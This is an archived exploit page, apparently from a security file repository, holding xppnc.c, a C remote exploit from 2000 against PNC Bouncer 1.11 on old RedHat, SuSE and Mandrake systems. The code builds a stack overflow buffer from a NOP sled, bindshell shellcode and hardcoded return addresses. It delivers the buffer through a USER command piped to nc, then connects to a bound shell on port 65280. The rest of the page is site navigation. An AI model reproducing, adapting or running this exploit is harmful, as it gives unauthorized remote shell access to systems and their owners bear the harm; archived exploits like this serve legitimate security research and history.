xppnc.c

xppnc.c: Posted Jul 21, 2000; Authored by RaiSe | Site undersec.com; PNC Bouncer remote exploit - tested against v1.11 on RedHat 6.0, SuSE 6.3, and Mandrake 6.0.; tags | exploit, remote; systems | linux, redhat, suse, mandrake; SHA-256 | f3e7d956629059a23a4eafb60363507ed837755b27f531596180153d41af5c6f; Download | Favorite | View

xppnc.c

/* PNC Bouncer Xploit por RaiSe                 */
/* Testeado en version 1.11                     */
/*                                              */
/* Offset en RedHat 6.0 0xbffffb24              */
/* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */
/* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */
/* bindshell by ADM                             */
/*                                              */
/* UNDERSEC Security Team                       */
/* https://www.undersec.com                      */

#include <stdio.h>

int i;
char *ptr;
unsigned long *ptr2,dire;
char bindshell[] =
  "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
  "\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
  "\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
  "\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
  "\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
  "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d"
  "\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
  "\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
  "\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
  "\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
  "\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
  "\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
  "\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
  "\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77"; 

char buffer[1091];

int main(int argc, char *argv[])
{
  if (argc<3) {
    printf("\nPNC Bouncer Xploit por RaiSe");
    printf("\nUNDERSEC Security TEAM\nhttps://www.undersec.com");
    printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]);
    printf("                nc host 65280\n\n");
    printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n");
    exit(0);
  }

  if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; }
  if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; }
  if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; }

  for(i=0;i<1091;i++)
    buffer[i]=0x00;
    ptr=buffer;

  for(i=0;i<1011-strlen(bindshell);i++)
    *(ptr++)=0x90;
  for(i=0;i<strlen(bindshell);i++)
    *(ptr++)=bindshell[i];
  ptr2=(long *)ptr;
  for(i=0;i<20;i++)
    *(ptr2++)=dire+atoi(argv[1]);

  sleep(4);
  printf("USER %s\n",buffer);
}
/*                    www.hack.co.za           [19 July]*/

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

xppnc.c

xppnc.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

xppnc.c

Share This

xppnc.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems